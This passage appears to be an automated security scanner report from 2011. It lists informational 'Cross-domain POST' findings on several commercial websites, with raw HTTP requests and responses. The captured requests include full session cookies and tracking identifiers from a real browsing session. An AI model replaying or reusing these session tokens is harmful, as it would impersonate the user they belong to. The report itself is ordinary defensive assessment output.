<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e88fa84a611b9a98058613" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">61</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">60</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"22d17c7d",fb_dtsg:"AQAoZjOu",no_cookies:1,lhsh:"GAQABQhzp"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){defer_until(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","mobile":false,"nodeType":"link","externalURL":"http:\/\/www.guardian.co.uk\/football\/2011\/sep\/27\/manchester-united-basel-live","pageId":null,"widgetID":"connect_widget_4e88fa84a611b9a98058613","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","com
...[SNIP]...

Request 2

GET /plugins/like.php?app_id=178412055558267&href=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&send=false&layout=button_count&width=140&show_faces=false&action=recommend&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.142.42
X-Cnection: close
Date: Sun, 02 Oct 2011 23:58:03 GMT
Content-Length: 23344

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e88fa8bdae129395189817" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">61</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">60</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"57cc2e8c",fb_dtsg:"AQAoZjOu",no_cookies:1,lhsh:"zAQAeS3-n"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){defer_until(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","mobile":false,"nodeType":"link","externalURL":"http:\/\/www.guardian.co.uk\/football\/2011\/sep\/27\/manchester-united-basel-live","pageId":null,"widgetID":"connect_widget_4e88fa8bdae129395189817","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","com
...[SNIP]...
17.6. http://www.hotels.com/html/blank.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hotels.com
Path:   /html/blank.html

Request 1

GET /html/blank.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_sv_sid=1011730152590; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSRT=oQGJTgA; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; s_cc=true; s_sq=%5B%5BB%5D%5D; SSLB=1; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A2.2.1%3A196.1.0%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A195.0.0%3A104.0.1%7CHCOM_US; user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjIuMi4xOjE5Ni4xLjA6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMzIuMi4wLmkyOjEyMS41MDMuMC5pNzoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxOTUuMC4wOjEwNC4wLjF8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..

Response 1

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cteonnt-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>

Request 2

GET /html/blank.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_sv_sid=1011730152590; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSRT=oQGJTgA; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; s_cc=true; s_sq=%5B%5BB%5D%5D; SSLB=1; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A2.2.1%3A196.1.0%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A195.0.0%3A104.0.1%7CHCOM_US; user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjIuMi4xOjE5Ni4xLjA6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMzIuMi4wLmkyOjEyMS41MDMuMC5pNzoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxOTUuMC4wOjEwNC4wLjF8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..

Response 2

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
ntCoent-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSID=BQAeUhsAAAAAAADiAYlOj_AAAuIBiU4BAAAAAAAAAAAA4gGJTgA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:29:22 GMT
Set-Cookie: SSSC=3.G5659056476975591567.1|0.0; path=/; domain=.hotels.com
Set-Cookie: SSRT=4gGJTgA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:29:22 GMT
Set-Cookie: SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:29:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>
18. Cross-domain POST  previous  next
There are 12 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

18.1. http://www.aon.com/site/products-services.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/products-services.jsp

Issue detail

The page contains a form which POSTs data to the domain now.eloqua.com. The form contains the following fields:

Request

GET /site/products-services.jsp HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/default.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/default.jsp%7C1317601823485%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/default.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/site/products-services.jsp%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:01:41 GMT
Content-Length: 97637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
</span>
           <form name="cform" action="http://now.eloqua.com/e/f2.aspx" method="post" id="cform" onsubmit="return validateForm()">
           <div class="contactform">
...[SNIP]...
18.2. http://www.aon.com/site/search.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/search.jsp

Issue detail

The page contains a form which POSTs data to the domain now.eloqua.com. The form contains the following fields:

Request

GET /site/search.jsp?entqr=3&output=xml_no_dtd&entspa=a&sort=date%3AD%3AL%3Ad1&client=default_frontend&ud=1&oe=UTF-8&ie=UTF-8&OPN=RT1&num=5&start=0&site=AONCOM_ENGLISH&q=xss+txt+css+img+help+faq&x=7&y=9 HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/site/products-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/site/products-services.jsp%7C1317601842083%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/site/products-services.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/siteImages/search_btn.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:01:43 GMT
Content-Length: 83533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
</span>
           <form name="cform" action="http://now.eloqua.com/e/f2.aspx" method="post" id="cform" onsubmit="return validateForm()">
           <div class="contactform">
...[SNIP]...
18.3. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/2011/sep/27/manchester-united-basel-live

Issue detail

The page contains a form which POSTs data to the domain www.guardianbookshop.co.uk. The form contains the following fields:

Request

GET /football/2011/sep/27/manchester-united-basel-live HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; OAX_tmp=4d686437616b36492b4b304142554a59; _publishflow=4galn0lq98x95vrg; member_type=0; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D27%3B; GU_ST=; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:55 GMT
Server: Apache
X-GU-jas: 54-23155
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; path=/; domain=.guardian.co.uk; expires=Sun, 23-Oct-2011 23:57:55 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 121369
Connection: close


<!DOCTYPE html><html lang="en">

<head>
                <script type="text/javascript" >
document.domain = "guardian.co.uk";

...[SNIP]...
</p>
    <form method="POST" action="http://www.guardianbookshop.co.uk/BerteShopWeb/search.do" name="QuickSearchForm">
    <input type="text" class="searchBox" value="" name="keyword">
...[SNIP]...
18.4. http://www.guardian.co.uk/football/manchester-united  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/manchester-united

Issue detail

The page contains a form which POSTs data to the domain www.guardianbookshop.co.uk. The form contains the following fields:

Request

GET /football/manchester-united HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:53 GMT
Server: Apache
X-GU-jas: 57-21851
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 91378
Connection: close


<!DOCTYPE html><html lang="en">

<head>

                <script type="text/javascript" >
document.domain = "guardian.co.uk";
...[SNIP]...
</p>
    <form method="POST" action="http://www.guardianbookshop.co.uk/BerteShopWeb/search.do" name="QuickSearchForm">
    <input type="text" class="searchBox" value="" name="keyword">
...[SNIP]...
18.5. http://www.sabreairlinesolutions.com/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/

Issue detail

The page contains a form which POSTs data to the domain emergo5.sabre.com. The form contains the following fields:

Request

GET /home/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabre.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618452; expires=Tue, 02-Oct-2012 00:07:32 GMT; path=/; domain=www.sabreairlinesolutions.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=www.sabreairlinesolutions.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:33 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15314


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<div id="login_container">
<form autocomplete="off" id="community_login" action="https://emergo5.sabre.com/amserver/UI/Login" name="community_login" method="post">
<p id="portal_sign_in">
...[SNIP]...
18.6. http://www.turkishairlines.com/en-CA/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/index.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/index.aspx HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.turkishairlines.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<div class="miles radius-4px shadow-4px">

<form method="post" action="https://www4.thy.com/tkmiles/j_security_check?lang=en">
<input type="hidden" value="TK" id="tk" name="tk">
...[SNIP]...
18.7. http://www.turkishairlines.com/en-CA/quick_search_part.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=checkin HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3203


<form id="step-2" action="https://www4.thy.com/onlinecheckin/checkpax.tk?lang=en" method="post" class="validate" rel="test">
<div class="title">Check-in</div>
<div class="quick_search-online">

...[SNIP]...
18.8. http://www.turkishairlines.com/en-CA/quick_search_part.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=award HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1739

<form id="odulBiletLogin" name="tklogin" action="http://www4.thy.com/troyaonline/mainPageAwardStart.tk?lang=en" method="post">
<input type="hidden" value="TK" name="tk">
...[SNIP]...
18.9. http://www.turkishairlines.com/en-CA/quick_search_part.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=arr HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
